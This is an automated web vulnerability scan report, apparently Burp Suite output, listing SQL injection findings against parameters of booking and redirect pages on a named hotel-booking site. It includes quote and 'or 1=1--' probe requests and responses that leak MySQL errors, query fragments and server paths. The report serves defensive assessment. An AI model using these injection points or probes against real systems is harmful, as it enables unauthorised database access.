<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
<br />
<b>Notice</b>
...[SNIP]...

1.8. http://parkcitytrips.com/booking_results.php [sMonth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The sMonth parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sMonth parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10'&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 1

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:52:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bmvn05e8t200ud9416chgnac60; path=/
Connection: close
Content-Length: 1992


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
Error: A problem was
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and ecat.inactiveDate = '0000-00-00' and ecl.inactiveDate = '0000-00-00' and' at line 1

Request 2

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10''&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 2

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:52:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=3b294fp2l6gnq8ru08pn0i6h96; path=/
Connection: close
Content-Length: 48602


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
<br />
<b>Notice</b>
...[SNIP]...

1.9. http://parkcitytrips.com/booking_results.php [sYear parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://parkcitytrips.com
Path:   /booking_results.php

Issue detail

The sYear parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sYear parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010'&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 1

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:52:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vc1amodl0qji23f0ioser8c217; path=/
Connection: close
Content-Length: 1992


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
Error: A problem was
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and ecat.inactiveDate = '0000-00-00' and ecl.inactiveDate = '0000-00-00' and' at line 1

Request 2

GET /booking_results.php?cloneID=41&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010''&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&group_id=982 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
Referer: http://parkcitytrips.com/redirect_booking.php?cloneID=41&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SERVERID=i-f3d4a39a

Response 2

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 22:52:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n2fc0mpbn3ale9568ucvgdd797; path=/
Connection: close
Content-Length: 48602


<br />
<b>Notice</b>: A non well formed numeric value encountered in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/dateClasses.php</b> on line <b>494</b><br />
<br />
<b>Notice</b>
...[SNIP]...

1.10. http://parkcitytrips.com/redirect.php [catID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The catID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /redirect.php?group_id=982&cloneID=41&catID=103'&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=11&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 1

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:51:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 274
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>INSERT INTO submissionClicks(eventID, ipAddress, date, categoryID, cloneID, clickSourcesID, linkTypesID, cloneTabID, groupID) VALUES('1436
...[SNIP]...

Request 2

GET /redirect.php?group_id=982&cloneID=41&catID=103''&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=11&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 2

HTTP/1.0 302 Found
Date: Wed, 09 Feb 2011 22:51:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://tools.jackrabbitsystems.com/tracking/redirect/?c=7040139&k=dc161b2d123d05723ae6c613f0e34c0f40fa9484&u=http%3A%2F%2Fwww.marriott.com%2Fhotels%2Ftravel%2Fslcms-marriotts-mountainside%2F
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


1.11. http://parkcitytrips.com/redirect.php [clickSourceID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The clickSourceID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the clickSourceID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2&clickSourceID=4' HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 1

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 23:00:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 273
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>INSERT INTO submissionClicks(eventID, ipAddress, date, categoryID, cloneID, clickSourcesID, linkTypesID, cloneTabID, groupID) VALUES('1436
...[SNIP]...

Request 2

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2&clickSourceID=4'' HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 2

HTTP/1.0 302 Found
Date: Wed, 09 Feb 2011 23:00:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://tools.jackrabbitsystems.com/tracking/redirect/?c=7040565&k=c64c37a8aecfe9e3d970ccc916e80620d55650d4&u=http%3A%2F%2Ftools.jackrabbitsystems.com%2Fpassthru%2FLimited+Chains%2Fmarriott_mountainside_resort%3Faction%3Dlink%26adults%3D1%26children%3D1%26clone_id%3D41%26controller%3Dredirects%26end%3D2011-02-15%26lodging%3Dmarriott_mountainside_resort%26market%3Dnew_mexico%26start%3D2011-02-14
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


1.12. http://parkcitytrips.com/redirect.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /redirect.php?group_id=982&cloneID=41'&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=11&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:49:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 249
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT * FROM clones WHERE id = 41'</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

1.13. http://parkcitytrips.com/redirect.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payloads 18541441%20or%201%3d1--%20 and 18541441%20or%201%3d2--%20 were each submitted in the eventID parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /redirect.php?group_id=982&cloneID=41&nights=3&rooms=1&adults=1&kids=0&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=143618541441%20or%201%3d1--%20&clickSourceID=11&linkTypeID=5&interstitial=show HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Wed, 09 Feb 2011 23:08:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 217
Content-Type: text/html; charset=UTF-8
Connection: close

<br />
<b>Fatal error</b>: Allowed memory size of 67108864 bytes exhausted (tried to allocate 16 bytes) in <b>/mnt/book_direct/releases/20110209222312/v002/dbase/classes/trips_classes.php</b> on line <b>85</b><br />

Request 2

GET /redirect.php?group_id=982&cloneID=41&nights=3&rooms=1&adults=1&kids=0&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=143618541441%20or%201%3d2--%20&clickSourceID=11&linkTypeID=5&interstitial=show HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 2 (redirected)

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 23:08:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Vary: Accept-Encoding
Content-Length: 2349
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<title>Park City Chamber of Commerce Hotel Search Engine</title>
<link rel="stylesheet" type="text/css" media="screen, print" href="/css/parkcity_template.css" />

<script>

function autoload() {
   if(document.forms[0]) {
document.forms[0].submit();
}
   else {
       window.location = "booking_results.php?clone_id=41&group_id=982&lodgingID=103";
   
   }
}

</script>

<style>

   body{
       font-size:12px;
       color:#000;
       font-family:Arial, Helvetica, sans-serif;
   }
   
           body{
           background-color:#FFFFFF;
       }
   
</style>


</head>

<body onload="setTimeout(autoload, 100);">
<center>
<iframe src="http://www.parkcityinfo.com/header_jackrabbit.cfm" width="100%" height="115" frameborder="0" allowtransparency="true" scrolling="no"></iframe>
<table cellpadding="0" cellspacing="0" class="booking_main_table" style="background-color:#FFF;width:939px;border-left:7px solid #323C46;border-right:7px solid #323C46;">
<tr>
   <td>
<div style="padding-top:125px; padding-bottom:125px; text-align: center; font-size:13px;">
<p>Please be patient while we process your request.</p>
<p><img src="http://www.jackrabbitsystems.com/images/trip_images/activityanimation.gif"></p>
<p style="font-size:12px;">Click <a href="booking_results.php?clone_id=41&group_id=982&lodgingID=103">here</a> if your browser does not automatically redirect.</p>

</div>
</td>
</tr>
</table>
<iframe src="http://www.parkcityinfo.com/footer_jackrabbit.cfm" width="100%
...[SNIP]...

1.14. http://parkcitytrips.com/redirect.php [eventID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The eventID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the eventID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=1436'&linkTypeID=2&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:53:14 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 561
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>SELECT el.id, el.eventID, lt.id as 'linkTypeID', lt.description ,lu.id as 'linkUrlID', lu.urlString, el.partnerID, el.fileName, el.inactiv
...[SNIP]...
</i> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND el.linkTypesID = 2' at line 1

1.15. http://parkcitytrips.com/redirect.php [group_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The group_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the group_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /redirect.php?group_id=982'&cloneID=41&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=11&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 1

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:47:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 274
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>INSERT INTO submissionClicks(eventID, ipAddress, date, categoryID, cloneID, clickSourcesID, linkTypesID, cloneTabID, groupID) VALUES('1436
...[SNIP]...

Request 2

GET /redirect.php?group_id=982''&cloneID=41&catID=103&sDate=2010-10-26&eDate=2010-10-29&eventID=1436&linkTypeID=11&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 2

HTTP/1.0 302 Found
Date: Wed, 09 Feb 2011 22:47:34 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://tools.jackrabbitsystems.com/tracking/redirect/?c=7040014&k=982eb9ec6be71eed0bbc44ac22e48abc81f3cca5&u=http%3A%2F%2Fwww.marriott.com%2Fhotels%2Ftravel%2Fslcms-marriotts-mountainside%2F
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


1.16. http://parkcitytrips.com/redirect.php [linkTypeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://parkcitytrips.com
Path:   /redirect.php

Issue detail

The linkTypeID parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the linkTypeID parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2'&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 1

HTTP/1.0 200 OK
Date: Wed, 09 Feb 2011 22:56:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 273
Content-Type: text/html; charset=UTF-8
Connection: close

Error: A problem was encountered while executing the query <i>INSERT INTO submissionClicks(eventID, ipAddress, date, categoryID, cloneID, clickSourcesID, linkTypesID, cloneTabID, groupID) VALUES('1436
...[SNIP]...

Request 2

GET /redirect.php?group_id=982&cloneID=41&catID=103&eventID=1436&linkTypeID=2''&clickSourceID=4 HTTP/1.1
Host: parkcitytrips.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SERVERID=i-f3d4a39a; __utmv=252597768.|2=Results%20Page=parkcitytrips.com=1,; __utmz=252597768.1297289442.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=rso1kpo756scrthfhm9htcvdf3; __utma=252597768.924705233.1297289442.1297289442.1297289442.1; __utmc=252597768; __utmb=252597768.4.10.1297289442;

Response 2

HTTP/1.0 302 Found
Date: Wed, 09 Feb 2011 22:56:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://tools.jackrabbitsystems.com/tracking/redirect/?c=7040384&k=623e81c7fc4f673d7304102b953a32d0a723319a&u=http%3A%2F%2Ftools.jackrabbitsystems.com%2Fpassthru%2FLimited+Chains%2Fmarriott_mountainside_resort%3Faction%3Dlink%26adults%3D1%26children%3D1%26clone_id%3D41%26controller%3Dredirects%26end%3D2011-02-15%26lodging%3Dmarriott_mountainside_resort%26market%3Dnew_mexico%26start%3D2011-02-14
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close


1.17. http://parkcitytrips.com/redirect_booking.php [cloneID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://parkcitytrips.com
Path:   /redirect_booking.php

Issue detail

The cloneID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the cloneID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /redirect_booking.php?cloneID=41'&group_id=982&rooms=1&nights=1&sDay=26&sMonth=10&sYear=2010&start-date=02%2F10%2F2011&end-date=02%2F13%2F2011&lodgingID=103&Submit.x=58&Submit.y=29 HTTP/1.1
Host: parkcitytrips.com
Proxy-Connection: keep-alive
